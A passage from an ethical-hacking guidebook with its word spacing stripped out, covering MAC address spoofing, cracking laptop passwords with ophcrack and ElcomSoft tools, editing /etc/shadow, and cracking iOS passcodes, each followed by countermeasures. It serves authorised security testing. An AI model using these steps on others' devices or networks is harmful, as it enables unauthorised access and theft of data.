ThefollowingcommandalsoworksinLinux:[root@localhostroot]#iplinksetwlan0address01:23:45:67:89:ab

c. Bringtheinterfacebackupwiththiscommand:

[root@localhostroot]#ifconfigwlan0up

IfyouchangeyourLinuxMACaddressesoften,youcanuseamorefeature-richutilitycalledGNUMACChanger(https://github.com/alobbs/macchanger).

MorerecentversionsofWindowsmakeitdifficulttochangeyourMACaddress.YoumightbeabletochangeyourMACaddressesinyourwirelessNICpropertiesviaControlPanel.However,ifyoudon’tliketweakingtheOSinthismanner(orcannot),youcantryaneatandinexpensivetoolcreatedbyKLCConsultingcalledSMAC(availableatwww.klcconsulting.net/smac).TochangeyourMACaddress,youcanusethestepsIoutlineinChapter9.

Whenyou’redone,SMACpresentssomethingsimilartothescreenshowninFigure10-18.

ToreverseanyoftheprecedingMACaddresschanges,simplyreversethestepsperformedandthendeleteanydatayoucreated.

NotethatAPs,routers,switches,andthelikemightdetectwhenmorethanonesystemisusingthesameMACaddressonthenetwork(thatis,yoursandthehostthatyou’respoofing).Youmighthavetowaituntilthatsystemisnolongeronthenetwork;however,IrarelyseeanyissuesspoofingMACaddressesinthisway,soyouprobablywon’thavetodoanything.

4. EnsurethatyouareconnectedtotheappropriateSSID.

EvenifyournetworkisrunningWEPorWPA,youcanstilltestyourMACaddresscontrols.Youjustneedtoenteryourencryptionkey(s)beforeyoucanconnect.

5. ObtainanIPaddressonthenetwork.

Youcandothisbyrebootingordisabling/enablingyourwirelessNIC.However,youcandoitmanuallybyrunningipconfig/renewataWindowscommandpromptorbymanuallyenteringaknownIPaddressinyourwirelessnetworkcard’snetworkproperties.

6. Confirmthatyou’reonthenetworkbypinginganotherhostorbrowsingtheInternet.

Inthisexample,IcouldpingtheAP(10.11.12.154)orsimplyloadmyfavoritewebbrowsertoseewhetherIcanaccesstheInternet.

https://github.com/alobbs/macchanger


Figure10-16:FindinganaccessibleAPviaNetStumbler.

Figure10-17:LookingfortheMACaddressofawirelessclientonthenetworkbeingtested.

Figure10-18:SMACshowingaspoofedMACaddress.

That’sallthereistoit!You’vecircumventedyourwirelessnetwork’sMACaddresscontrolsinsixsimplesteps.Pieceofcake!

CountermeasuresagainstMACspoofingTheeasiestwaytopreventthecircumventionofMACaddresscontrolsandsubsequentunauthorizedattachmenttoyourwirelessnetworkistoenableWPA2.AnotherwaytocontrolMACspoofingisbyusingaWIPS.Thissecondoptioniscertainlymorecostly,butitcouldbewellworththemoneywhenyouconsidertheotherproactivemonitoringandblockingbenefitssuchasystemwouldprovide.

PhysicalsecurityproblemsVariousphysicalsecurityvulnerabilitiescanresultinphysicaltheft,thereconfigurationofwirelessdevices,andthecapturingofconfidentialinformation.Youshouldlookforthefollowingsecurityvulnerabilitieswhentestingyoursystems:

APsmountedontheoutsideofabuildingandaccessibletothepublic.Poorlymountedantennas—orthewrongtypesofantennas—thatbroadcasttoostrongasignalandthatareaccessibletothepublic.YoucanviewthesignalstrengthinNetStumbler,yourwirelessclientmanager,oroneofthecommercialtoolsImentionearlierinthischapter.

Theseissuesareoftenoverlookedbecauseofrushedinstallations,improperplanning,andlackoftechnicalknowledge,buttheycancomebacktohauntyou.ThebookWirelessNetworksForDummiesprovidesmoredetails.

Countermeasuresagainstphysicalsecurityproblems

EnsurethatAPs,antennas,andotherwirelessandnetworkinfrastructureequipmentarelockedawayinsecureclosets,ceilings,orotherplacesthataredifficultforawould-beintrudertoaccessphysically.TerminateyourAPsoutsideanyfirewallorothernetworkperimetersecuritydevices—oratleastinaDMZ—wheneverpossible.Ifyouplaceunsecuredwirelessequipmentinsideyoursecurenetwork,itcannegateanybenefitsyouwouldgetfromyourperimetersecuritydevices,suchasyourfirewall.

Ifwirelesssignalsarepropagatingoutsideyourbuildingwheretheydon’tbelong,either

TurndownthetransmitpowersettingofyourAP.Useasmallerordifferentantenna(semidirectionalordirectional)todecreasethesignal.

Somebasicplanninghelpspreventthesevulnerabilities.

VulnerablewirelessworkstationsWirelessworkstationssuchasWindows-basedlaptopscanhavetonsofsecurityvulnerabilities—fromweakpasswordstounpatchedsecurityholestothestorageofWEPandWPAencryptionkeyslocally.Mostofthewell-knownwirelessclientvulnerabilitieshavebeenpatchedbytheirrespectivevendors,butyouneverknowwhetherallyourwirelesssystemsarerunningthelatest(andusuallysafest)versionsofoperatingsystems,wirelessclientsoftware,andothersoftwareapplications.

Inadditiontousingthewirelessclient,stumbling,andnetworkanalysissoftwareImentionearlierinthischapter,youshouldalsosearchforwirelessclientvulnerabilitiesbyperformingauthenticatedscansusingvariousvulnerabilitytestingtools,suchasGFILanGuard,Nexpose,andAcunetixWebVulnerabilityScanner.

Theseprogramsaren’twireless-specific,buttheymightturnupvulnerabilitiesinyourwirelesscomputersthatyoumightnothavediscoveredorthoughtabouttestingotherwise.IcoveroperatingsystemandapplicationvulnerabilitiesaswellasusingthetoolsintheprecedinglistinPartsIVandVofthisbook.

CountermeasuresagainstvulnerablewirelessworkstationsYoucanimplementthefollowingcountermeasurestokeepyourworkstationsfrombeingusedasentrypointsintoyourwirelessnetwork:

Regularlyperformvulnerabilityassessmentsonyourwirelessworkstations,inadditiontoothernetworkhosts.Applythelatestvendorsecuritypatchesandenforcestronguserpasswords.Usepersonalfirewallsandendpointsecuritysoftwareonallwirelesssystemswherepossible,includingphonesandtablets,tokeepmaliciousintrudersoffthosesystemsandoutofyournetwork.

Installanti-malwaresoftware.

DefaultconfigurationsettingsSimilartowirelessworkstations,wirelessAPshavemanyknownvulnerabilities.ThemostcommononesaredefaultSSIDsandadminpasswords.Themorespecificonesoccuronlyoncertainhardwareandsoftwareversionsthatarepostedinvulnerabilitydatabasesandvendorwebsites.ManywirelesssystemsstillhaveWEPandWPAdisabledbydefaultaswell.

CountermeasuresagainstdefaultconfigurationsettingsexploitsYoucanimplementsomeofthesimplestandmosteffectivesecuritycountermeasuresforWi-Fi—andthey’reallfree:

MakesurethatyouchangedefaultadminpasswordsandSSIDs.Ataminimum,enableWPA2.Useverystrongpre-sharedkeys(PSKs)consistingofatleast20randomcharactersoruseWPA/WPA2inenterprisemodewithaRADIUSserverforhostauthentication.DisableSSIDbroadcastingifyoudon’tneedthisfeature.ApplythelatestfirmwarepatchesforyourAPsandWi-Ficards.ThiscountermeasurehelpstopreventvariousvulnerabilitiestominimizetheexploitationofpubliclyknownholesrelatedtomanagementinterfacesonAPsandclient-managementsoftwareontheclients.

Chapter11

MobileDevicesInThisChapter

Seekingoutthecommonweaknessesinlaptops,phones,andtablets

Executingsecurityteststouncovercrucialmobileflaws

ExploringthesecurityvulnerabilitiesassociatedwiththeInternetofThings(IoT)

Minimizingmobilesecurityrisks

Mobilecomputingisthenewtargetforbusiness—andforhacking.Itseemsthateveryonehasamobiledeviceofsomesortforeitherpersonalorbusinessuse;oftenboth.Ifnotproperlysecured,mobiledevicesconnectedtotheenterprisenetworkrepresentthousandsuponthousandsofunprotectedislandsofinformationfloatingabout,outofyourcontrol.

Becauseofallthephones,tablets,andlaptopsrunningnumerousoperatingsystemplatformschock-fullofapps,aninfinitenumberofrisksareassociatedwithmobilecomputing.Ratherthandelvingintoallthevariables,thischapterexploressomeofthebiggest,mostcommonmobilesecurityflawsthatcouldimpactyouandyourbusiness.

SizingUpMobileVulnerabilitiesItpaystofindandfixthelow-hangingfruitonyournetwork.That’swhereyougetthemostbangforyourbuck.Thefollowingmobilelaptop,phone,andtabletweaknessesshouldbefrontandcenteronyourprioritylist:

NoencryptionPoorlyimplementedencryptionNopower-onpasswordsEasilyguessed(orcracked)power-onpasswords

Forothertechnologiesandsystems(webapplications,operatingsystems,andsoon),youcanusuallyfindjustthetestingtoolyouneed.However,forfindingmobile-relatedflaws,relativelyfewsecuritytestingtoolsareavailable.Notsurprisingly,themoreexpensivetoolsoftenenableyoutouncoverthebigflawswiththeleastamountofpainandhassle.

CrackingLaptopPasswordsArguablythegreatestthreattoanybusiness’ssecurityisunencryptedlaptops.Givenalltheheadlinesandawarenessaboutthiseffectivelyinexcusablesecurityvulnerability,Ican’tbelieveit’sstillsoprevalentinbusiness.ThissectionexplorestoolsyoucanusetocrackunencryptedlaptoppasswordsonWindows,Linux,orMacOSXsystems.Youthenfindoutaboutthebasiccountermeasurestopreventthisvulnerability.

ChoosingyourtoolsMyfavoritetooltodemonstratetherisksassociatedwithunencryptedlaptopsrunningWindowsisElcomSoftSystemRecovery(www.elcomsoft.com/esr.html).YousimplyburnthistooltoaCDanduseittobootthesystemyouwanttorecover(orreset)thepasswordfrom,asshowninFigure11-1.

Figure11-1:ElcomSoftSystemRecoveryisgreatforcrackingandresettingWindowspasswordsonunprotectedlaptops.

Youhavetheoptiontoresetthelocaladministrator(orother)passwordorhaveitcrackallpasswords.It’sreallythatsimple,andit’shighlysuccessful,evenonthelatestoperatingsystems,suchasWindows8.1orWindows10.Themostdifficultandtime-

http://www.elcomsoft.com/esr.html

consumingthingaboutElcomSoftSystemRecoveryisdownloadingandburningittoCD.

YoucanalsouseanoldertoolforWindowscalledNTAccess(www.mirider.com/ntaccess.html)forresettinglocalWindowsaccounts.Thisprogramisn’tprettyorfancy,butitdoesthejob.Thereareothersavailableaswell.Aswithophcrack(discussedalittlelaterinthissection),ElcomSoftandNTAccessprovideanexcellentwaytodemonstratethatyouneedtoencryptyourlaptopharddrives.

Peoplewilltellyoutheydon’thaveanythingimportantorsensitiveontheirlaptops.Theydo.Evenseeminglybenignlaptopsusedfortrainingorsalescanhavetonsofsensitiveinformationthatcanbeusedagainstyourbusiness.Thisincludesspreadsheetsthatusershavecopiedfromthenetworktoworkonlocally,VPNconnectionswithstoredlogincredentials,webbrowsersthathavecachedbrowsinghistory,andevenworse,websitepasswordsthatusershavechosentosave.

Afteryouresetorcrackthelocaladministrator(orother)account,youcanlogintoWindowsandhavefullaccesstothesystem.BysimplypokingaroundusingWinHex(www.winhex.com/winhex)orsimilarorAccessEnum(https://technet.microsoft.com/en-us/library/bb897332.aspx),youcanfindsensitiveinformation,remotenetworkconnections,andcachedwebconnectionstodemonstratethebusinessrisk.Ifyouwanttodigevendeeper,youcanuseadditionaltoolsfromElcomSoft(www.elcomsoft.com/products.html),suchasElcomSoftInternetPasswordBreaker,ProactiveSystemPasswordRecovery,andAdvancedEFSDataRecoveryforuncoveringadditionalinformationfromWindowssystems.Passware(www.lostpassword.com)offersmanysimilarcommercialtoolsaswell.

IfyouwanttoperformsimilarchecksonaLinux-basedlaptop,youshouldbeabletobootfromaKnoppix(www.knoppix.net)orsimilar“live”Linuxdistributionandeditthelocalpasswdfile(often/etc/shadow)toresetorchangeit.Removetheencryptedcodebetweenthefirstandsecondcolonsforthe“root”(orwhateveruser)entryorcopythepasswordfromtheentryofanotheruserandpasteitintothatarea.PasswareKitForensiccanbeusedtodecryptMacOSXsystemsencryptedwithFileVault2.

Ifyou’rebudget-strappedandneedafreeoptionforcrackingWindowspasswords,youcanuseophcrackasastandaloneprograminWindowsbyfollowingthesesteps:

1. Downloadthesourcefilefromhttp://ophcrack.sourceforge.net.

2. Extractandinstalltheprogrambyenteringthefollowingcommand:

ophcrack-vista-livecd-3.6.0.exe(orwhateverthecurrentfilenameis)

http://www.mirider.com/ntaccess.html

http://www.winhex.com/winhex

https://technet.microsoft.com/en-us/library/bb897332.aspx

http://www.elcomsoft.com/products.html

http://www.lostpassword.com

http://www.knoppix.net/


http://downloads.sourceforge.net/ophcrack/ophcrack-vista-livecd-3.6.0.iso

3. LoadtheprogrambystartingtheophcrackiconfromyourStartmenu.

4. ClicktheLoadbuttonandselectthetypeoftestyouwanttorun.

Inthisexample,showninFigure11-2,I’mconnectingtoaremoteservercalledserver1.Thisway,ophcrackwillauthenticatetotheremoteserverusingmylocallylogged-inusernameandrunpwdumpcodetoextractthepasswordhashesfromtheserver’sSAMdatabase.Youcanalsoloadhashesfromthelocalmachineorfromhashesextractedduringapreviouspwdumpsession.

TheextractedpasswordhashusernameswilllooksimilartothoseshowninFigure11-3.

5. ClicktheLaunchicontobegintherainbowcrackprocess.

IfyouseethatpasswordhashesareonlyintheNTHashcolumnasshowninFigure11-3,you’llneedtomakesureyouhavedownloadedtheproperhashtablesfromhttp://ophcrack.sourceforge.net/tables.phporelsewhere.AgoodonetostartwithwouldbeVistaspecial(8.0GB).Inordertoloadnewtables,youclicktheTablesiconatthetopoftheophcrackwindowasshowninFigure11-4.

Figure11-2:LoadingpasswordhashesfromaremoteSAMdatabaseinophcrack.

http://ophcrack.sourceforge.net/tables.php

Figure11-3:Usernamesandhashesextractedviaophcrack.

Figure11-4:Loadingtherequiredhashtablesinophcrack.

Ifnecessary,relaunchtherainbowcrackprocessinStep5.Theprocesscantakejustafewsecondstoseveraldays(ormore)dependingonyourcomputer’sspeedandthecomplexityofthehashesbeingcracked.

There’salsoabootableLinux-basedversionofophcrack(availableathttp://ophcrack.sourceforge.net/download.php?type=livecd)thatallowsyoutobootasystemandstartcrackingpasswordswithouthavingtologinorinstallanysoftware.

Ihighlyrecommendyouuseophcrack’sLiveCDonasamplelaptopcomputerortwotodemonstratejusthowsimpleitistorecoverpasswordsand,subsequently,sensitiveinformationfromlaptopsthatdon’thaveencryptedharddrives.It’samazinglysimple,yetpeoplestillrefusetoinvestmoneyinfulldiskencryptionsoftware.ElcomSoftSystemRecoveryisanothergreattoolforthisexercise.

CountermeasuresThebestsafeguardagainstahackerusingapasswordresetprogramagainstyoursystemsistoencryptyourharddrives.YoucanuseBitLockerinWindows,WinMagicSecureDoc(www.winmagic.com/products),orotherpreferredproductfortheplatformyoursystemsarerunningon.

Power-onpasswordssetintheBIOScanbehelpfulaswell,butthey’reoftenamerebumpintheroad.AllacriminalhastodoisresettheBIOSpasswordor,betteryet,simplyremovetheharddrivefromyourlostsystemandaccessitfromanothermachine.Youalsoneedtoensurethatpeoplecan’tgainunauthorizedphysicalaccesstoyourcomputers.Whenahackerhasphysicalaccessandyourdrivesarenotencrypted,allbetsareoff.Thatsaid,fulldiskencryptionisnotfoolproof—seethenearbysidebar,“Thefallacyoffulldiskencryption.”

http://ophcrack.sourceforge.net/download.php?type=livecd

http://www.winmagic.com/products

ThefallacyoffulldiskencryptionItseemssimpleenoughtojustencryptyourlaptopharddrivesandbedonewithlaptopsecurity.Inaperfectworld,thatwouldbethecase,butaslongaspeopleareinvolved,Isuspectthismobileweaknesswillcontinuetoexist.

Severalproblemswithdiskencryptioncreateafalsesenseofsecurity:

Passwordselection:Yourdiskencryptionisonlyasgoodasthepassword(orpassphrase)thatwasusedtoenabletheencryption.

Keymanagement:Ifyourusersdon’thaveawaytogetintotheirsystemsiftheyforgetorlosetheirpasswords,they’llgetburnedonceanddowhateverittakesnottoencrypttheirdrivesmovingforward.Also,certaindiskencryptionsoftwaresuchasMicrosoft’sBitLockermayprovidetheoptionfor(orevenrequire)userstocarryaroundtheirdecryptionkeyonathumbdriveorsimilarstoragedevice.Imaginelosingalaptopwiththekeytothekingdomstoredrightinsidethelaptopbag!Ithappens.

Screenlocking:Thisthirdpotentiallyfatalflawwithfulldiskencryptionoccurswhenusersrefusetoensuretheirscreensarelockedwhenevertheystepawayfromtheirencryptedlaptops.Allittakesisafewsecondsforacriminaltoswipealaptoptogain—andmaintain—fullaccesstoalaptopthat’s“fullyprotected”withfulldiskencryption.

Onefinalnote,andthisisimportant:certaintypesoffulldiskencryptioncanbecrackedaltogether.Forexample,theprotectionsofferedbyBitLocker,FileVault2(MacOSX),andTrueCryptcanbefullynegatedbyaprogramfromPasswarecalledPasswareKitForensic(www.lostpassword.com/kit-forensic.htm).IcoverthisflawandotherenterprisesecurityconcernsinvolvingBitLockerinmywhitepapersavailableatwww.principlelogic.com/bitlocker.html.Furthermore,youshouldn’tbeusingTrueCryptgiventhatitsoriginaldeveloperswentdarkandflawsexistthatcanallowforfullsystemcompromise.AnotheroptionforcrackingencrypteddisksisElcomSoftForensicDiskDecryptor(www.elcomsoft.com/efdd.html).Evenwiththesevulnerabilities,fulldiskencryptioncanstillprotectyoursystemsfromthelesstechnically-inclinedpassers-bywhomightendupinpossessionofoneofyourlostorstolensystems.

http://www.lostpassword.com/kit-forensic.htm

http://www.principlelogic.com/bitlocker.html

http://www.elcomsoft.com/efdd.html

CrackingPhonesandTabletsIdon’tenvyITadministratorsandinformationsecuritymanagersformanyreasonsbutespeciallywhenitcomestothebringyourowndevice(BYOD)movementtakingplaceinbusinesstoday.WithBYOD,youhavetotrustthatyourusersaremakinggooddecisionsaboutsecurity,andyouhavetofigureouthowtomanageeachandeverydevice,platform,andapp.ThismanagementtaskisarguablythegreatestchallengeITprofessionalshavefacedtothispoint.Furthercomplicatingmatters,youhavecriminalhackers,thieves,andotherhooligansdoingtheirbesttoexploitthecomplexityofitall,andit’screatingsomeseriousbusinessrisks.Therealityisthatveryfewbusinesses—andindividuals—havetheirphonesandtabletsproperlysecured.

Plentyofvendorsclaimthattheirmobiledevicemanagement(MDM)solutionsaretheanswertophoneandtabletwoes.They’reright…toanextent.MDMcontrolsthatseparatepersonalinformationfrombusinessinformationandensurethepropersecuritycontrolsareenabledatalltimescanhelpyoumakeabigleaptowardlockingdownthemobileenterprise.

Oneofthegreatestthingsyoucandotoprotectphonesandtabletsfromunauthorizeduseistoimplementthisniftysecuritycontrolthatdatesbacktothebeginningofcomputers:passwords.Yep,yourphoneandtabletusersshouldemploygoodold-fashionedpasswords(technicallypassphrases)thatareeasytorememberyethardtoguess.Passwordsareoneofthebestcontrolsyoucanhave.Yetthereareplentyofmobiledeviceswithnopasswordsorpasswordsthatareeasilycracked.

StartingwithiOS9,devicescomewitha6-characterpasscodedefault.AndroidLollipoporiginallydefaultedtoencryptingtheentiredevicealthoughthatwasreversedaftercomplaintsofperformancedegradation.

Inthefollowingsection,Idemonstrateaccessingmobiledevicesbyusingacommercialforensicstool.Keepinmindthatsuchtoolsaretypicallyrestrictedtolawenforcementpersonnelandsecurityprofessionals,buttheycouldcertainlyendupinthehandsofthebadguys.Usingsuchtoolsforyourowninformationsecuritytestingcanbeagreatwaytodemonstratethebusinessriskandmakethecaseforbettermobilecontrols.

Mobileappscanintroduceaslewofsecurityvulnerabilitiesintoyourenvironment,especiallycertainappsavailableforAndroidviaGooglePlaythataren’tproperlyvetted.InrecentsourcecodeanalysisusingCheckmarx’sCxSuite(seeChapter15),I’vefoundtheseappstohavethesameflawsastraditionalsoftware,suchasSQLinjection,hard-codedencryptionkeys,andbufferoverflowsthatcanputsensitiveinformationatrisk.Thethreatofmalwareisthereaswell.Mobileappsareyetanotherreasontogetyourmobileenvironmentunder

controlusing,ataminimum,aprovenMDMsystemsuchasMaaS360(www.maas360.com)orAirWatch(www.air-watch.com).

CrackingiOSpasswordsI’dventuretoguessthatmanyphoneandtabletpasswords(really,they’rejust4-digitPINs,orpasscodes)canbeguessedoutright.Amobiledevicegetslostorstolenandallthepersonrecoveringithastodoistrysomebasicnumbercombinationssuchas1234,1212,or0000.Soon,voilà!—thesystemisunlocked.

ManyphonesandtabletsrunningiOSandAndroidareconfiguredtowipethedeviceiftheincorrectpasswordisenteredXnumberoftimes(often10failedattempts).Areasonablesecuritycontrolindeed.Butwhatelsecanbedone?Somecommercialtoolscanbeusedtocracksimplepasswords/PINsandrecoverinformationfromlostorstolendevicesordevicesundergoingaforensicsinvestigation.

ElcomSoft’siOSForensicToolkit(http://ios.elcomsoft.com)providesameansfordemonstratingjusthoweasilypasswords/PINsoniOS-basedphonesandtabletscanbecrackedupthroughiOSversion7.Here’show:

1. PlugyouriPhone/iPod/iPadintoyourtestcomputerandplaceitintoDeviceFirmwareUpgrade(DFU)mode.

ToenterDFUmode,simplypowerthedeviceoff,holddowntheHomebutton(bottomcenter)andsleepbutton(oftentheupperrightcorner)atthesametimefor10seconds,andcontinueholdingdowntheHomebuttonforanother10seconds.Themobiledevicescreengoesblank.

2. LoadtheiOSForensicToolkitbyinsertingyourUSBlicensedongleintoyourtestcomputerandrunningTookit.cmd.

YouseethescreenshowninFigure11-5.

3. LoadtheiOSForensicToolkitRamdiskontothemobiledevicebyselectingoption2LOADRAMDISK.

LoadingtheRAMDISKcodeallowsyourtestcomputertocommunicatewiththemobiledeviceandrunthetoolsneededforcrackingthepassword(amongotherthings).

4. SelecttheiOSdevicethat’sconnected,asshowninFigure11-6.

Iselectedoption14becauseIhaveaniPhone4withGSM.

Younowseethetoolkitconnecttothedeviceandconfirmasuccessfulload,asshowninFigure11-7.YoushouldseetheElcomSoftlogointhemiddleofyourmobiledevice’sscreenaswell.

5. Tocrackthedevicespassword/PIN,simplyselectoption6GETPASSCODEonthemainmenu.

iOSForensicToolkitwillpromptyoutosavethepasscodetoafile.Youcanpress

http://www.maas360.com

http://www.air-watch.com

http://ios.elcomsoft.com

Entertoacceptthedefaultofpasscode.txt.Thecrackingprocesswillcommenceand,withanyluck,thepasscodewillbefoundanddisplayedasshowninFigure11-8.

So,havingnopasswordforphonesandtabletsisbad,anda4-digitPINsuchasthisisnotmuchbetter.Userbeware!

YoucanalsouseiOSForensicToolkittocopyfilesandevencrackthekeychainstouncoverthepasswordthatprotectsthedevice’sbackupsiniTunes(option5GETKEYS).

UsingElcomSoft’siOSForensicToolkittocrackiOSversions8andupwon’tbequiteasfruitfulfornowasApplehasfinallystartedtoreallylockdowntheoperatingsystem.AppleiOSisstillnotwithoutitsflaws.AsrecentlyasiOS9,therewasanexploitthatallowedattackerstobypasstheloginscreenaltogether.

Ifanything,youneedtobethinkingabouthowyourbusinessinformation,whichismostcertainlypresentonphonesandtablets,isgoingtobehandledintheeventoneofyouremployee’sdevicesisseizedbylawenforcementpersonnel.Sure,they’llfollowtheirchain-of-custodyprocedures,butoverall,they’llhaveverylittleincentivetoensuretheinformationstaysprotectedinthelongterm.

Figure11-5:iOSForensicToolkit’smainpage.

Figure11-6:SelecttheappropriateiOSdevicefromthelist.

Figure11-7:iOSForensicToolkitRamdiskloadingsuccessfully.

Figure11-8:Crackinga4-digitPINonaniPhone.

Becarefulwithhowyousyncyourmobiledevicesand,especially,wherethefilebackupsarestored.Theymaybeoffinthewildblueyonder(thecloud),whichmeansyouhavenorealwaytogaugehowsecurethepersonalandbusinessinformationtrulyis.Ontheotherhand,whensynchedfilesandbackupsarestoredwithoutapassword,withaweakpassword,oronanunencryptedlaptop,everythingisstillatriskgiventhetoolsavailabletocracktheencryptionusedtoprotectthisinformation.Forinstance,ElcomSoft’sPhoneBreaker(www.elcomsoft.com/eppb.html)canbeusedtounlockbackupsfromBlackBerryandAppledevicesaswellasrecoveronlinebackupsmadetoiCloudandWindowsLive!.

OxygenForensicSuite(www.oxygen-forensic.com)isanalternativecommercialtoolthatcanbeusedforcrackingiOS-basedpasswordsaswellasadditionalrecoveryfunctionalityforAndroid-basedsystems.Figure11-9showstheOxygenForensicSuiteinterfaceandtypesofinformationthatcanbeextractedfromanAndroid-baseddevice.TheOxygenForensicSuiteExtractortoolcanconnectandextractthisinformationrelativelyquickly—somethingthatcan,ofcourse,beusedagainstyourorganizationwhenmobiledevicesarelostorstolen.

http://www.elcomsoft.com/eppb.html

http://www.oxygen-forensic.com/

Figure11-9:OxygenForensicSuite.

OxygenForensicSuiteisalsogreatforperformingsecurityassessmentsofmobileapps,whichIcoverinChapter15.

CountermeasuresagainstpasswordcrackingThemostrealisticwaytopreventsuchpasswordcrackingistorequire—andcontinuallyenforce—strongpasswordssuchasmulti-digitPINsconsistingof5ormorenumbersor,betteryet,complexpassphrasesthatareveryeasytorememberyetpracticallyimpossibletocracksuchasProgressive_r0ck_rules!.MDMcontrolscanhelpyouenforcesuchapolicy.You’lllikelygetpushbackfromemployeesandmanagement,butit’stheonlysurebettohelppreventthisattack.Icovergettingbuy-inforyoursecurityinitiativesinChapter20.Goodluck!

HackingtheInternetofThingsNochapteronmobiledeviceswouldbecompletewithoutsomecoverageoftheInternetofThings(IoT).Computersystemsthatfallintothis“IoT”includeeverythingfromhomealarmsystemstomanufacturingequipmenttocoffeepotsandprettymuchanythinginbetween.Evenautomobilescannowbehackedasyou’velikelyheardaboutinthehighlypublicizedhackagainstaJeepCherokeein2015.

CiscoSystemshasestimatedthattheIoTwillgrowto50billiondevicesby2020!PerhapsthisiswhyallIPv4addressesarenowgone.I’mnotsurethatthat’sagoodthingformostpeople,butitcertainlysoundslikejobsecurityforthoseofusworkinginthisindustry.Ifyou’regoingtolockdownIoTsystems,youmustfirstunderstandhowthey’revulnerable.GiventhatIoTsystemsarenotunlikeothernetworksystems(i.e.,theyhaveanIPaddressand/orawebinterface),you’llbeabletousestandardvulnerabilityscannerstouncoverflaws.AdditionalsecuritychecksyoushouldrunonIoTsystemsinclude:

Whatinformationisstoredonthesystem(i.e.,sensitivecustomerinformation,intellectualproperty,orbiodatafromdevicessuchasFitbitsandAppleWatches)?Ifsystemsarelostorstolen,isthatgoingtocreatebusinessrisks?

Howisinformationcommunicatedtoandfromeachsystem?Isitencrypted?

Arepasswordsrequired?Whatarethedefaultpasswordcomplexitystandards?Cantheybechanged?Doesintruderlockoutexisttohelppreventpasswordcracking?

Whatpatchesaremissingthatfacilitatesecurityexploits?Aresoftwareupdatesevenavailable?

Howdothesystemsstandupundervulnerabilityscansand,evenmoreso,simulateddenialofserviceattacks?

WhatadditionalsecuritypoliciesneedtobeinputinplacetoaddressIoTsystems?

Justlikeanyothersysteminyournetworkenvironment,IoTsystems,devices,andwidgets(orwhateveryoucallthem)needtobeincludedinthescopeofyoursecuritytesting.Ifthey’renot,vulnerabilitiescouldbelurkingthatifeventuallyexploitedcanleadtoabreachorpotentiallyevenmorecatastrophicsituation.

PartIV

HackingOperatingSystems

Visitwww.dummies.com/extras/hackingformoregreatDummiescontentonline.


Inthispart…Nowthatyou’repastthenetworklevel,it’stimetogetdowntothenitty-gritty—thosefunoperatingsystemsyouuseonadailybasisandhavecometobothlove(andhate).Idefinitelydon’thaveenoughroominthisbooktocovereveryoperatingsystemversionoreveneveryoperatingsystemvulnerability,butIcertainlyhittheimportantparts—especiallytheonesthataren’teasilyfixedwithpatches.

Thispartstartsbylookingatthemostwidelyused(andpickedon)operatingsystem—MicrosoftWindows.FromWindowsXP(yep,it’sstilloutthere!)toWindows10andServer2016,Ishowyousomeofthebestwaystoattacktheseoperatingsystemsandsecurethemfromthebadguys.ThispartthenlooksatLinuxanditslesspublicized(yetstillmajor)securityflaws.ManyofthehacksandcountermeasuresIcovercanapplytomanyotherflavorsofUNIXand,yes,evenMacOSXaswell.

Chapter12

WindowsInThisChapter

PortscanningWindowssystems

GleaningWindowsinformationwithoutloggingin

CatchingtheWindowssecurityflawsyoudon’twanttooverlook

ExploitingWindowsvulnerabilities

MinimizingWindowssecurityrisks

MicrosoftWindows(withsuchversionsasWindows7;WindowsServer2012;Windows8.1;andthenewestflavor,Windows10)isthemostwidelyusedoperatingsystem(OS)intheworld.It’salsothemostwidelyabused.IsthisbecauseMicrosoftdoesn’tcareasmuchaboutsecurityasotherOSvendors?Theshortansweris“no.”Sure,numeroussecurityflawswereoverlooked—especiallyintheWindowsNTdays—butMicrosoftproductsaresopervasivethroughouttoday’snetworksthatMicrosoftistheeasiestvendortopickon;therefore,Microsoftproductsoftenendupinthebadguys’crosshairs.Theonepositiveaboutcriminalhackersisthatthey’redrivingtherequirementforbettersecurity!

Manyofthesecurityflawsintheheadlinesaren’tnew.They’revariantsofvulnerabilitiesthathavebeenaroundforalongtime.You’veheardthesaying,“Themorethingschange,themoretheystaythesame.”Thatapplieshere,too.MostWindowsattacksarepreventableifthepatchesareproperlyapplied.Thus,poorsecuritymanagementisoftentherealreasonWindowsattacksaresuccessful,yetMicrosofttakestheblameandmustcarrytheburden.

InadditiontothepasswordattacksIcoverinChapter8,manyotherattacksarepossibleagainstaWindows-basedsystem.TonsofinformationcanbeextractedfromWindowsbysimplyconnectingtothesystemacrossanetworkandusingtoolstoextracttheinformation.Manyofthesetestsdon’tevenrequireyoutobeauthenticatedtotheremotesystem.AllsomeonewithmaliciousintentneedstofindonyournetworkisavulnerableWindowscomputerwithadefaultconfigurationthat’snotprotectedbysuchmeasuresasapersonalfirewallandthelatestsecuritypatches.

Whenyoustartpokingaroundonyournetwork,youmightbesurprisedathowmanyofyourWindows-basedcomputershavesecurityvulnerabilities.Furthermore,you’llbeevenmoresurprisedatjusthoweasyitistoexploitvulnerabilitiestogaincompleteremotecontrolofWindowsbyusingatoolsuchasMetasploit.AfteryouconnecttoaWindowssystemandhaveavalidusernameandpassword(byknowingitorderivingitbyusingthepassword-crackingtechniquesdiscussedinChapter8orothertechniquesoutlinedinthischapter),youcandigdeeperandexploitotheraspectsofWindows.

Thischaptershowsyouhowtotestforsomeofthelow-hangingfruitinWindows(the

flawsthatgetpeopleintotroublethemost)andoutlinescountermeasurestomakesureyourWindowssystemsaresecure.

IntroducingWindowsVulnerabilitiesGivenWindows’easeofuse,itsenterprise-readyActiveDirectoryservice,andthefeature-rich.NETdevelopmentplatform,mostorganizationsusetheMicrosoftplatformformuchoftheirnetworkingandcomputingneeds.Manybusinesses—especiallythesmall-tomedium-sizedones—dependsolelyontheWindowsOSfornetworkusage.Manylargeorganizationsruncriticalservers,suchaswebserversanddatabaseservers,ontheWindowsplatformaswell.Ifsecurityvulnerabilitiesaren’taddressedandmanagedproperly,theycanbringanetworkoranentireorganization(largeorsmall)toitsknees.

WhenWindowsandotherMicrosoftsoftwareareattacked—especiallybyawidespreadInternet-basedwormorvirus—hundredsofthousandsoforganizationsandmillionsofcomputersareaffected.Manywell-knownattacksagainstWindowscanleadtothefollowingproblems:

Leakageofsensitiveinformation,includingfilescontaininghealthcareinformationandcreditcardnumbersPasswordsbeingcrackedandusedtocarryoutotherattacksSystemstakencompletelyofflinebydenialofservice(DoS)attacksFullremotecontrolbeingobtainedEntiredatabasesbeingcopiedordeleted

